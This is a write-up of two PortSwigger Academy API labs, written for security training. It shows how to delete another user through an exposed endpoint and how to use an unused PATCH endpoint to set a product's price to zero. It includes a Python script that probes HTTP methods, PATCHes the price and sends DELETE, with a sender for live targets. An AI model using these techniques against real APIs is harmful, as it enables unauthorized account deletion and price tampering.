API Testing - PortSwigger

Walkthrough of the API Testing labs in the PortSwigger Web Security Academy.

Exploiting an API endpoint using documentation

Task:

To solve the lab, find the exposed API documentation and delete carlos. You can log in to your own account using the following credentials: wiener:peter.

Walkthrough:

First, set up your proxy and browse the site to intercept some requests.

Our goal is to delete a user through the API, so this endpoint under /api looks like the way to go.

This GET request to the API returns the page where we can change our email address.

Let's trigger the API by changing our email and see what kind of request we intercept.

We see a new request to a per-user endpoint we have not seen before.

We can change the request method to DELETE and simply replace the username wiener in the path with carlos.

Job done: the user carlos is deleted.

Finding and exploiting an unused API endpoint

Task:

To solve the lab, exploit a hidden API endpoint to buy a Lightweight l33t Leather Jacket. You can log in to your own account using the following credentials: wiener:peter.

Walkthrough:

First, log in to the app with the given credentials and navigate to the jacket to discover potentially interesting endpoints.

Our account balance is $0 and we need that $1337.00 jacket. There is an interesting JSON body in a response coming from the API: {"price":"$1337.00","message":"Your neighbor just bought one of these! Don't feel left out!"} We can assume we will have to change the request method to POST in order to manipulate the API data.

The response is "Method Not Allowed". We can try the other methods until the error message changes.

Apparently PATCH is allowed, and PATCH lets us modify API data. The error tells us only the 'application/json' Content-Type is supported, so we have to add that header to the request.

PATCH applies partial changes to a resource; since we did not send a body describing the change, we get another error.

Based on our first json, we can modify the price with this payload :

{
    "price":0
}

Add it as the request body, send it, and the price shown on the website changes, so the jacket can now be bought with our $0 balance.
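Both labs come down to the same routine: take an endpoint seen in the proxy, find out which HTTP methods it actually routes, then send the one that changes state with the body and Content-Type the API demands. The script below is an added example written for this page, not code from the labs or from PortSwigger. The endpoint paths (/api/products/1/price, /api/user/<name>), the error strings and the FakeLabApi simulator are all assumptions constructed so the script runs offline; against a real lab instance you would pass urllib_sender(base_url, session_cookie) instead of the simulator's send.

```python
"""Method-tampering helper for the two API labs (added example, not lab code).

Every sender has the same shape: send(method, path, headers, body) -> (status, text).
`urllib_sender` talks to a live target; `FakeLabApi.send` is a constructed
stand-in with assumed paths and error messages so the flow can run offline.
"""
import json
import urllib.error
import urllib.request

# Assumed paths, modelled on the walkthrough; the real lab may differ.
PRICE_PATH = "/api/products/1/price"
USER_PREFIX = "/api/user/"

# Methods probed blindly. DELETE is left out on purpose: probing it against
# your own account would delete it, so it is only sent deliberately below.
PROBE_METHODS = ("GET", "HEAD", "OPTIONS", "POST", "PUT", "PATCH")


def urllib_sender(base_url, session_cookie):
    """Build a sender for a live instance; `session_cookie` is copied from the proxy."""
    def send(method, path, headers=None, body=None):
        req = urllib.request.Request(base_url + path, data=body, method=method)
        req.add_header("Cookie", f"session={session_cookie}")
        for name, value in (headers or {}).items():
            req.add_header(name, value)
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read().decode()
        except urllib.error.HTTPError as err:  # 4xx/5xx are data here, not failures
            return err.code, err.read().decode()
    return send


def probe_methods(send, path, methods=PROBE_METHODS):
    """Send each method with no body; keep every one not rejected with 405.
    A non-405 error (e.g. a Content-Type complaint) is the 'different error
    message' that tells us the method is routed."""
    routed = {}
    for method in methods:
        status, _ = send(method, path)
        if status != 405:
            routed[method] = status
    return routed


def _parse(text):
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        return None


def patch_json(send, path, payload):
    """PATCH a JSON document, declaring the Content-Type the API insists on."""
    body = json.dumps(payload).encode()
    status, text = send("PATCH", path, {"Content-Type": "application/json"}, body)
    return status, _parse(text)


def delete_user(send, path):
    """Deliberately send DELETE to a per-user endpoint (first lab)."""
    status, text = send("DELETE", path)
    return status, _parse(text)


class FakeLabApi:
    """Constructed simulator: a price resource accepting GET and JSON-only PATCH,
    and per-user resources that also accept DELETE. Not the real lab backend."""

    def __init__(self):
        self.price = "$1337.00"
        self.users = {"wiener", "carlos"}

    def send(self, method, path, headers=None, body=None):
        headers = headers or {}
        if path == PRICE_PATH:
            if method == "GET":
                return 200, json.dumps({"price": self.price})
            if method == "PATCH":
                if headers.get("Content-Type") != "application/json":
                    return 400, json.dumps({"error": "Only 'application/json' Content-Type is supported"})
                if not body:
                    return 400, json.dumps({"error": "missing request body"})
                self.price = f"${float(json.loads(body)['price']):.2f}"
                return 200, json.dumps({"price": self.price})
            return 405, "Method Not Allowed"
        user = path[len(USER_PREFIX):]
        if path.startswith(USER_PREFIX) and user in self.users:
            if method in ("GET", "PATCH"):
                return 200, json.dumps({"username": user})
            if method == "DELETE":
                self.users.discard(user)
                return 200, json.dumps({"deleted": user})
            return 405, "Method Not Allowed"
        return 404, "Not Found"


if __name__ == "__main__":
    api = FakeLabApi()
    print(probe_methods(api.send, PRICE_PATH))              # {'GET': 200, 'PATCH': 400}
    print(patch_json(api.send, PRICE_PATH, {"price": 0}))   # (200, {'price': '$0.00'})
    print(delete_user(api.send, USER_PREFIX + "carlos"))    # (200, {'deleted': 'carlos'})
```

The probe deliberately keeps anything that is not a 405, because a 400 about Content-Type or a missing body is exactly the signal that the method exists; only DELETE is kept out of the blind sweep, since on your own user it would solve the first lab against yourself.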
